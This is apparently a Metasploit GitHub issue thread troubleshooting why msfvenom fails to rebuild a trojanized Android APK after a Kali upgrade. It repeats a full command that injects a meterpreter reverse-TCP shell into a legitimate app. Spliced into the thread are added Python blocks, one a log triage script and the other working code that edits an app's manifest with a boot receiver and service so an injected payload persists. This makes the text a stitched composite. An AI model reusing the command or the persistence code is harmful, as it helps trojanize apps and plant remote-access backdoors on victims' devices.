
msfvenom apktool fails following upgrade to Kali Linux 2018.4 #11024

Closed
ssnkhan opened this issue Nov 25, 2018 · 24 comments

Comments

@ssnkhan commented Nov 25, 2018

Steps to reproduce

Since upgrading to a fresh and clean install of Kali Linux 2018.4, msfvenom is unable to generate weaponised APKs. An identical command worked prior to the update.

How'd you do it?

  1. apt-get install zipalign
  2. apt-get install lib32stdc++6 lib32ncurses6 lib32z1++
  3. msfvenom -x /root/Downloads/Diary.apk -p android/meterpreter/reverse_tcp LHOST=192.168.224.129 LPORT=4444 -f raw -o /root/Desktop/Diary.apk

apktool version:

Apktool v2.3.4 - a tool for reengineering Android apk files
with smali v2.2.2 and baksmali v2.2.2

Expected behavior

What should happen?
msfvenom should decompile, inject payload, and recompile the APK. An APK should be generated.

Current behavior

What happens instead?

<snip>
I: Building resources...
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:97: error: Public symbol array/activities declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:98: error: Public symbol array/font_family declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:99: error: Public symbol array/font_family_values declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:100: error: Public symbol array/font_size declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:101: error: Public symbol array/font_size_values declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:102: error: Public symbol array/jazzy_effects declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:103: error: Public symbol array/line_spacing declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:104: error: Public symbol array/line_spacing_values declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:105: error: Public symbol array/temp_unit declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:106: error: Public symbol array/temp_unit_values declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:107: error: Public symbol array/theme_values declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:108: error: Public symbol array/time_format declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:109: error: Public symbol array/time_format_values declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:110: error: Public symbol array/timeout declared here is not defined.
W: /tmp/d20181125-19831-1akn8q0/original/res/values/public.xml:111: error: Public symbol array/timeout_values declared here is not defined.
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_13823034621095822413.tmp, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 28, --version-code, 341, --version-name, 2.7.1, --no-version-vectors, -F, /tmp/APKTOOL1448141242914440406.tmp, -0, arsc, -0, META-INF/android.support.design_material.version, -0, META-INF/androidx.appcompat_appcompat.version, -0, META-INF/androidx.arch.core_core-runtime.version, -0, META-INF/androidx.asynclayoutinflater_asynclayoutinflater.version, -0, META-INF/androidx.browser_browser.version, -0, META-INF/androidx.cardview_cardview.version, -0, META-INF/androidx.coordinatorlayout_coordinatorlayout.version, -0, META-INF/androidx.core_core.version, -0, META-INF/androidx.cursoradapter_cursoradapter.version, -0, META-INF/androidx.customview_customview.version, -0, META-INF/androidx.documentfile_documentfile.version, -0, META-INF/androidx.drawerlayout_drawerlayout.version, -0, META-INF/androidx.fragment_fragment.version, -0, META-INF/androidx.interpolator_interpolator.version, -0, META-INF/androidx.legacy_legacy-support-core-ui.version, -0, META-INF/androidx.legacy_legacy-support-core-utils.version, -0, META-INF/androidx.legacy_legacy-support-v4.version, -0, META-INF/androidx.lifecycle_lifecycle-livedata-core.version, -0, META-INF/androidx.lifecycle_lifecycle-livedata.version, -0, META-INF/androidx.lifecycle_lifecycle-runtime.version, -0, META-INF/androidx.lifecycle_lifecycle-viewmodel.version, -0, META-INF/androidx.loader_loader.version, -0, META-INF/androidx.localbroadcastmanager_localbroadcastmanager.version, -0, META-INF/androidx.media_media.version, -0, META-INF/androidx.percentlayout_percentlayout.version, -0, META-INF/androidx.preference_preference.version, -0, META-INF/androidx.print_print.version, -0, META-INF/androidx.recyclerview_recyclerview.version, -0, META-INF/androidx.slidingpanelayout_slidingpanelayout.version, -0, 
META-INF/androidx.swiperefreshlayout_swiperefreshlayout.version, -0, META-INF/androidx.transition_transition.version, -0, META-INF/androidx.vectordrawable_vectordrawable-animated.version, -0, META-INF/androidx.vectordrawable_vectordrawable.version, -0, META-INF/androidx.versionedparcelable_versionedparcelable.version, -0, META-INF/androidx.viewpager_viewpager.version, -0, META-INF/com.google.android.material_material.version, -0, META-INF/services/com.github.scribejava.core.httpclient.HttpClientProvider, -0, META-INF/services/io.grpc.ManagedChannelProvider, -0, META-INF/services/io.grpc.NameResolverProvider, -0, png, -0, jpg, -0, res/drawable-hdpi-v4/colorstrip_shadow.9.png, -0, res/drawable-ldrtl-xxhdpi-v17/abc_spinner_mtrl_am_alpha.9.png, -0, res/drawable-xhdpi-v4/com_facebook_tooltip_black_background.9.png, -0, res/drawable-xhdpi-v4/com_facebook_tooltip_blue_background.9.png, -0, res/drawable-xhdpi-v4/notification_bg_low_normal.9.png, -0, res/drawable-xhdpi-v4/notification_bg_low_pressed.9.png, -0, res/drawable-xhdpi-v4/notification_bg_normal.9.png, -0, res/drawable-xhdpi-v4/notification_bg_normal_pressed.9.png, -0, res/drawable-xxhdpi-v4/abc_ab_share_pack_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_btn_switch_to_on_mtrl_00001.9.png, -0, res/drawable-xxhdpi-v4/abc_btn_switch_to_on_mtrl_00012.9.png, -0, res/drawable-xxhdpi-v4/abc_cab_background_top_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_list_divider_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_list_focused_holo.9.png, -0, res/drawable-xxhdpi-v4/abc_list_longpressed_holo.9.png, -0, res/drawable-xxhdpi-v4/abc_list_pressed_holo_dark.9.png, -0, res/drawable-xxhdpi-v4/abc_list_pressed_holo_light.9.png, -0, res/drawable-xxhdpi-v4/abc_list_selector_disabled_holo_dark.9.png, -0, res/drawable-xxhdpi-v4/abc_list_selector_disabled_holo_light.9.png, -0, res/drawable-xxhdpi-v4/abc_menu_hardkey_panel_mtrl_mult.9.png, -0, res/drawable-xxhdpi-v4/abc_popup_background_mtrl_mult.9.png, -0, 
res/drawable-xxhdpi-v4/abc_scrubber_primary_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_scrubber_track_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_spinner_mtrl_am_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_switch_track_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_tab_indicator_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_textfield_activated_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_textfield_default_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_textfield_search_activated_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/abc_textfield_search_default_mtrl_alpha.9.png, -0, res/drawable-xxhdpi-v4/amu_bubble_mask.9.png, -0, res/drawable-xxhdpi-v4/amu_bubble_shadow.9.png, -0, res/drawable-xxhdpi-v4/common_google_signin_btn_icon_dark_normal_background.9.png, -0, res/drawable-xxhdpi-v4/common_google_signin_btn_icon_light_normal_background.9.png, -0, res/drawable-xxhdpi-v4/common_google_signin_btn_text_dark_normal_background.9.png, -0, res/drawable-xxhdpi-v4/common_google_signin_btn_text_light_normal_background.9.png, -0, gif, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20181125-19831-1akn8q0/original/res, -M, /tmp/d20181125-19831-1akn8q0/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool

System stuff

Metasploit version

Framework: 4.17.26-dev
Console : 4.17.26-dev

I installed Metasploit with:

  • Kali package via apt

OS

What OS are you running Metasploit on?
Kali Linux 2018.4 virtualised in VMWare, on OSX.
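The rebuild output above, and the second run later in this thread, mix several distinct aapt failures that get talked past each other. The following is an added example, not code from Metasploit or Apktool: a small triage script that sorts captured apktool/msfvenom output into failure classes and extracts the undefined public symbols and the aapt exit code. The classes and hints are one engineer's reading of these messages, and the two embedded logs are constructed, abridged copies of the runs quoted in this issue; it generalises to any apktool build log, not only these two.

```python
"""Triage an apktool/msfvenom rebuild log into actionable failure classes.

Added example, not code from the Metasploit or Apktool projects. The failure
classes and hints are this example's own reading of the messages quoted in the
thread; the sample logs below are constructed, abridged copies of them.
"""
import re
from typing import Dict, List, Optional

# Each rule: compiled pattern, failure class, practitioner hint (assumption).
RULES = [
    (re.compile(r"Public symbol (?P<sym>\S+) declared here is not defined"),
     "public-symbol-undefined",
     "res/values/public.xml names a resource that was not decoded; clear the "
     "framework cache (apktool empty-framework-dir) and decode again"),
    (re.compile(r"Could not extract resource: /prebuilt/aapt"),
     "bundled-aapt-missing",
     "this apktool build has no embedded aapt and falls back to the aapt on "
     "$PATH; check that binary's version"),
    (re.compile(r"Invalid file name: must contain only \[a-z0-9_\.\]"),
     "aapt-rejects-resource-name",
     "the APK carries resource files (e.g. $avd_...) the fallback aapt refuses"),
    (re.compile(r"First type is not attr!"),
     "aapt-resource-table-order",
     "aapt aborted while building resources.arsc"),
]

# apktool wraps the aapt invocation; the exit code tells crash (134) from error (1).
EXIT_RE = re.compile(r"could not exec \(exit code = (?P<code>\d+)\)")


def triage(log_text: str) -> Dict[str, object]:
    """Return failure classes with hit counts, undefined symbols and the aapt exit code."""
    classes: Dict[str, int] = {}
    hints: Dict[str, str] = {}
    symbols: List[str] = []
    exit_code: Optional[int] = None
    for line in log_text.splitlines():
        for pattern, cls, hint in RULES:
            m = pattern.search(line)
            if not m:
                continue
            classes[cls] = classes.get(cls, 0) + 1
            hints[cls] = hint
            if "sym" in m.groupdict():
                symbols.append(m.group("sym"))
        m = EXIT_RE.search(line)
        if m:
            exit_code = int(m.group("code"))
    return {"classes": classes, "hints": hints, "symbols": symbols,
            "aapt_exit_code": exit_code}


# Constructed, abridged sample logs modelled on the two runs quoted in the issue.
LOG_FIRST_RUN = """\
I: Building resources...
W: /tmp/d2018/original/res/values/public.xml:97: error: Public symbol array/activities declared here is not defined.
W: /tmp/d2018/original/res/values/public.xml:98: error: Public symbol array/font_family declared here is not defined.
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util.tmp, p, --forced-package-id, 127]
Error: Unable to rebuild apk with apktool
"""

LOG_SECOND_RUN = """\
I: Building resources...
W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/aapt/linux/aapt (defaulting to $PATH binary)
W: res/drawable-v21/$avd_hide_password__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: A/        ( 2821): First type is not attr!
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 134):
Error: Unable to rebuild apk with apktool
"""

if __name__ == "__main__":
    for name, log in (("first run", LOG_FIRST_RUN), ("second run", LOG_SECOND_RUN)):
        result = triage(log)
        print(f"{name}: aapt exit code {result['aapt_exit_code']}")
        for cls, count in result["classes"].items():
            print(f"  {cls} x{count}: {result['hints'][cls]}")
```

Run it on a real capture with `msfvenom ... 2>&1 | tee build.log` and `triage(open("build.log").read())`; an exit code of 134 with no public-symbol hits points at the fallback aapt crashing, while exit code 1 with many undefined symbols points at the decode step and the framework cache.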

@ssnkhan (Author) commented Nov 25, 2018

I should add I have run apktool empty-framework-dir and also reviewed the following tickets:

iBotPeaches/Apktool#1780
iBotPeaches/Apktool#1725
iBotPeaches/Apktool#1579

@elogada commented Nov 25, 2018

Latest version of Apktool in the repo seems to be v2.3.4-dirty ...with smali v2.2.3-dev and baksmali v2.2.3-dev.

How's apt update; apt upgrade look like?

@ssnkhan (Author) commented Nov 25, 2018

Thanks @elogada - running apt update; apt upgrade still shows:

Apktool v2.3.4 - a tool for reengineering Android apk files
with smali v2.2.2 and baksmali v2.2.2

@elogada commented Nov 25, 2018

Perhaps /etc/apt/sources.list isn't updated? The official Kali Linux repositories are listed in
https://docs.kali.org/general-use/kali-linux-sources-list-repositories

Try that first. But if you've updated that already, maybe the architecture is different for Mac and apktool has different packages for it. But I'm probably wrong. Start with the sources.list first.

@elogada commented Nov 25, 2018

To check faster just smack your terminal with

apt update; apt install --only-upgrade apktool

edit: after updating your sources, of course.

@ssnkhan (Author) commented Nov 25, 2018

Thanks for your continued help @elogada. This is the content of my sources.list file:

# 
# deb cdrom:[Debian GNU/Linux 2018.4 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20181016-16:07]/ kali-last-snapshot contrib main non-free

#deb cdrom:[Debian GNU/Linux 2018.4 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20181016-16:07]/ kali-last-snapshot contrib main non-free

deb http://http.kali.org/kali kali-rolling main non-free contrib
# deb-src http://http.kali.org/kali kali-rolling main non-free contrib

# This system was installed using small removable media
# (e.g. netinst, live or single CD). The matching "deb cdrom"
# entries were disabled at the end of the installation process.
# For information about how to configure apt package sources,
# see the sources.list(5) manual.

I uncommented the deb-src and re-ran apt update; apt install --only-upgrade apktool which yielded:

Hit:1 https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch InRelease
Hit:2 http://ftp.hands.com/kali kali-rolling InRelease
Get:3 http://ftp.hands.com/kali kali-rolling/non-free Sources [131 kB]
Get:4 http://ftp.hands.com/kali kali-rolling/contrib Sources [62.3 kB]
Get:5 http://ftp.hands.com/kali kali-rolling/main Sources [12.4 MB]
Fetched 12.6 MB in 3s (3,918 kB/s)                      
Reading package lists... Done
Building dependency tree       
Reading state information... Done
13 packages can be upgraded. Run 'apt list --upgradable' to see them.
Reading package lists... Done
Building dependency tree       
Reading state information... Done
apktool is already the newest version (2.3.4-1).
The following packages were automatically installed and are no longer required:
  libbind9-160 libdns1102 libirs160 libisc169 libisccc160 libisccfg160 liblwres160 libperl5.26 libpoppler74 libprotobuf-lite10 libprotobuf10 libqgis-analysis2.18.24
  libqgis-core2.18.24 libqgis-gui2.18.24 libqgis-networkanalysis2.18.24 libqgis-server2.18.24 libqgispython2.18.24 libradare2-2.9 libsane-extras libsane-extras-common
  libunbound2 openjdk-10-jdk openjdk-10-jdk-headless openjdk-10-jre python-anyjson python-backports.ssl-match-hostname python-couchdbkit python-http-parser python-jwt
  python-libemu python-restkit python-socketpool
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 13 not upgraded.

This is not fetching the latest version of apktool ...

@elogada commented Nov 25, 2018

Odd. Maybe you can try this. Check the dependencies of apktool using apt-cache depends apktool. Maybe those dependencies need upgrades or whatever.

I just read somewhere that apt isn't quite the same as apt-get (inb4 need more research). So

apt-get update; apt-get upgrade

would yield different results.

Also the latest smali is 2.2.5.

@ssnkhan (Author) commented Nov 25, 2018

Output is:

apktool
  Depends: aapt
  Depends: android-framework-res
 |Depends: default-jre-headless
  Depends: <java7-runtime-headless>
    default-jre-headless
    openjdk-10-jre-headless
    openjdk-11-jre-headless
    openjdk-8-jre-headless
  Depends: libantlr3-runtime-java
  Depends: libcommons-cli-java
  Depends: libcommons-io-java
  Depends: libcommons-lang3-java
  Depends: libguava-java
  Depends: libsmali-java
  Depends: libstringtemplate-java
  Depends: libxmlunit-java
  Depends: libxpp3-java
  Depends: libyaml-snake-java

I had already done an apt-get update; apt-get upgrade previously -- personally, I didn't know that apt-get existed, to be honest!

What is your output when you run apktool -v? This is literally a fresh install of 2018.4 - the only modifications I've made are to install zipalign and lib32stdc++6 lib32ncurses6 lib32z1++ as prerequisites. The only other tool installed is PowerShell Empire.

:(

@elogada commented Nov 25, 2018

Lol Linux noobs high-five! Anyway why not just install the whole metasploit-framework package without the --only-upgrade switch, maybe the packager should do everything for you.

apt-get install metasploit-framework

Here's my apktool -v:

Apktool v2.3.4-dirty - a tool for reengineering Android apk files
with smali v2.2.3-dev and baksmali v2.2.3-dev
Copyright 2014 Ryszard Wiśniewski <brut.alll@gmail.com>
Updated by Connor Tumbleson <connor.tumbleson@gmail.com>

And remove the --only-upgrade switch with apktool too for sureness' sake.

@ssnkhan (Author) commented Nov 25, 2018

Haha, high five! Metasploit comes baked in with Kali, but in any case re-running apt-get doesn't do much:

Reading package lists... Done
Building dependency tree       
Reading state information... Done
metasploit-framework is already the newest version (4.17.26-0kali1).
metasploit-framework set to manually installed.
The following packages were automatically installed and are no longer required:
  libbind9-160 libdns1102 libirs160 libisc169 libisccc160 libisccfg160 liblwres160 libperl5.26 libpoppler74 libprotobuf-lite10 libprotobuf10 libqgis-analysis2.18.24
  libqgis-core2.18.24 libqgis-gui2.18.24 libqgis-networkanalysis2.18.24 libqgis-server2.18.24 libqgispython2.18.24 libradare2-2.9 libsane-extras libsane-extras-common
  libunbound2 openjdk-10-jdk openjdk-10-jdk-headless openjdk-10-jre python-anyjson python-backports.ssl-match-hostname python-couchdbkit python-http-parser python-jwt
  python-libemu python-restkit python-socketpool
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 13 not upgraded.

@elogada commented Nov 25, 2018

How's your apktool -v for you? If all else fails, I think this should be taken as a bug to be repaired in a future commit. Tagging @bcoles

@ssnkhan (Author) commented Nov 25, 2018

@elogada I did another fresh install, and now the version correctly shows as:

Apktool v2.3.3-dirty - a tool for reengineering Android apk files
with smali v2.2.3-dev and baksmali v2.2.3-dev

Then tried again using a sample APK (https://www.apkmonk.com/download-app/com.pcvirt.ImageViewer/4_com.pcvirt.ImageViewer_2018-10-04.apk/ as an example)

Still getting errors, namely:

[-] I: Using Apktool 2.3.3-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
W: aapt: brut.common.BrutException: brut.common.BrutException: Could not extract resource: /prebuilt/aapt/linux/aapt (defaulting to $PATH binary)
W: res/drawable-v21/$avd_hide_password__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-v21/$avd_hide_password__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-v21/$avd_hide_password__2.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-v21/$avd_show_password__0.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-v21/$avd_show_password__1.xml: Invalid file name: must contain only [a-z0-9_.]
W: res/drawable-v21/$avd_show_password__2.xml: Invalid file name: must contain only [a-z0-9_.]
W: A/        ( 2821): First type is not attr!
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 134): 
<snip>
Error: Unable to rebuild apk with apktool

@elogada commented Nov 26, 2018

Perhaps change the filename to suit the needs of the stack trace? I think it hates the $.

@bcoles (Contributor) commented Nov 26, 2018

How's your apktool -v for you? If all else fails, I think this should be taken as a bug to be repaired in a future commit. Tagging @bcoles

Tagging @timwr

@ssnkhan (Author) commented Nov 26, 2018

@elogada I note the error, however even APKs which successfully re-compiled previously are throwing up an error at the rebuilding stage.

Specifically to do with aapt: brut.common.BrutException: brut.common.BrutException:. One of the work-arounds referenced in the apktool threads is to set the -r switch which does not decode APK resources. However it is not possible to set this switch when calling via msfvenom. The following thread has a little more detail:

sensepost/objection#157

However, there is some commentary there that suggests whilst this allows the build to complete, the APK may not be viable (will not work properly).

@ssnkhan (Author) commented Nov 26, 2018

Just noticed that the script at https://github.com/sensepost/kwetza/blob/master/kwetza.py already sets the -r switch, but unsure if this is the same script called by msfvenom (apologies for being a n00b):

command = ["apktool", "d","-f","-r", ""+cwd+"/"+sys.argv[1]]

@elogada commented Nov 26, 2018

Any chance you can do a pipe that goes something like msfvenom <params> | apktool <params>? I haven't tried myself, but maybe it's an option somehow? I say feature tag for this thread in this case.

However, is it possible that you can just make a meterpreter that works on arm (or maybe armhf) architectures, then recompile the apk file with the meterpreter included?

@ssnkhan (Author) commented Nov 26, 2018

It is possible to inject meterpreter manually, but that would defeat the point of being able to do so in an automated manner which msfvenom supported prior to 2018.4 breaking it.

As I said, this exact command, msfvenom -x /root/Downloads/Diary.apk -p android/meterpreter/reverse_tcp LHOST=192.168.224.129 LPORT=4444 -f raw -o /root/Desktop/Diary.apk worked perfectly on Kali 2018.3 last week.

@elogada commented Nov 26, 2018

Well if this isn't a problem with msf this might be a bug in the Kali kernel. Here's docs on the bug tracker:

Submitting Bugs for Kali Linux
https://docs.kali.org/community/submitting-issues-kali-bug-tracker

You might be able to search for a similar ticket in case they already have a hotfix for 2018.4.

@timwr (Contributor) commented Nov 27, 2018

The -r may help, but unfortunately decoding resources is needed to inject the permission, services and broadcast receiver into the AndroidManifest.xml. Without this the meterpreter is not persistent. I guess we could add an AndroidIgnoreResources=true option to avoid it.
We could also add support for a native meterpreter with injection (we'd simply be calling the static Runtime.load function instead of the Payload.start function, and add meterpreter as a lib).

I'm still a bit confused about the actual bug though, I can't reproduce this with apktool 2.3.4. Previously apktool empty-framework-dir fixed this kind of error.
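To make concrete why the resources must be decoded, as timwr says above and as the `-r` discussion earlier in the thread asks about: the following is an added example, not Metasploit's own Ruby injection code. It performs the manifest edits a persistence hook needs (a uses-permission, a service, and a receiver that wakes on boot) on a text AndroidManifest.xml as apktool decodes it, and refuses a manifest left in binary AXML form, which is what `apktool d -r` leaves behind and why a text edit cannot be applied to it. The sample manifest, the service and receiver class names, and the BOOT_COMPLETED trigger are illustrative assumptions.

```python
"""Why msfvenom's APK backdooring needs a *decoded* AndroidManifest.xml.

Added example, not Metasploit's injection code. The class names, the sample
manifest and the BOOT_COMPLETED trigger are illustrative assumptions.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ET.register_namespace("android", ANDROID_NS)  # keep the android: prefix on output

# Binary XML (AXML) starts with chunk type RES_XML_TYPE (0x0003) and a header
# size of 8, both little-endian; a decoded manifest starts with "<?xml" instead.
AXML_MAGIC = b"\x03\x00\x08\x00"


def attr(name: str) -> str:
    """Qualified attribute key for android:<name> as ElementTree stores it."""
    return f"{{{ANDROID_NS}}}{name}"


def manifest_kind(data: bytes) -> str:
    """'binary' for an undecoded AXML manifest, 'text' for one apktool decoded."""
    return "binary" if data[:4] == AXML_MAGIC else "text"


def inject_persistence(manifest: bytes, permissions, service_cls: str,
                       receiver_cls: str) -> bytes:
    """Add the permission, service and boot receiver a persistent payload needs.

    Idempotent: elements already present are left alone.
    """
    if manifest_kind(manifest) == "binary":
        raise ValueError("manifest is binary AXML; decode the APK without -r first")
    root = ET.fromstring(manifest)
    app = root.find("application")
    if app is None:
        raise ValueError("manifest has no <application> element")

    # uses-permission entries sit at manifest level; dedupe against what exists.
    have = {p.get(attr("name")) for p in root.findall("uses-permission")}
    for perm in permissions:
        if perm not in have:
            root.insert(0, ET.Element("uses-permission", {attr("name"): perm}))
            have.add(perm)

    # The payload service: not exported, so other apps cannot start it.
    if not any(s.get(attr("name")) == service_cls for s in app.findall("service")):
        ET.SubElement(app, "service", {attr("name"): service_cls,
                                       attr("exported"): "false"})

    # The receiver must be exported so the system can deliver BOOT_COMPLETED.
    if not any(r.get(attr("name")) == receiver_cls for r in app.findall("receiver")):
        recv = ET.SubElement(app, "receiver", {attr("name"): receiver_cls,
                                               attr("enabled"): "true",
                                               attr("exported"): "true"})
        flt = ET.SubElement(recv, "intent-filter")
        ET.SubElement(flt, "action",
                      {attr("name"): "android.intent.action.BOOT_COMPLETED"})

    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


# Constructed sample manifest, as apktool would decode it without -r.
SAMPLE_MANIFEST = b"""<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.diary">
    <uses-permission android:name="android.permission.INTERNET"/>
    <application android:label="Diary">
        <activity android:name=".MainActivity"/>
    </application>
</manifest>
"""

PERMS = ["android.permission.INTERNET",
         "android.permission.RECEIVE_BOOT_COMPLETED"]
SERVICE_CLS = "com.example.persist.PayloadService"     # assumption
RECEIVER_CLS = "com.example.persist.BootReceiver"      # assumption

if __name__ == "__main__":
    print(inject_persistence(SAMPLE_MANIFEST, PERMS, SERVICE_CLS, RECEIVER_CLS).decode())
    binary_stub = AXML_MAGIC + b"\x00" * 16   # constructed AXML header only
    print("binary manifest ->", manifest_kind(binary_stub))
```

On a real decode the manifest lives at `<outdir>/AndroidManifest.xml`; with `apktool d -r` the same path still holds the binary AXML, which is the case `manifest_kind` reports as `binary`, and the rebuild would then ship the app without the new receiver, matching the "not persistent" outcome timwr describes.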

@ssnkhan (Author) commented Nov 27, 2018

@elogada I registered to report the bug, but still have not received the registration email.

@timwr Looking at https://github.com/sensepost/kwetza/blob/master/kwetza.py, it appears that -r is already set. Is the msfvenom command I pasted working and generating a payload/APK on your install of 2018.4? I have tried apktool empty-framework-dir already, but doesn't appear to have resolved the issue.

@ssnkhan (Author) commented Nov 28, 2018

@busterb (Member) commented Nov 28, 2018

This seems like a bug in Kali's distribution of apktool, not really a bug in Metasploit. Feel free to continue discussion if you like, but I'm going to close it here since there's probably not much we can do in the metasploit-framework project to fix it for you. Feel free to reopen if that proves counter.

@busterb busterb closed this Nov 28, 2018

@ssnkhan ssnkhan referenced this issue Dec 1, 2018
@ssnkhan (Author) commented Dec 1, 2018

Issue has been raised with Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=915225
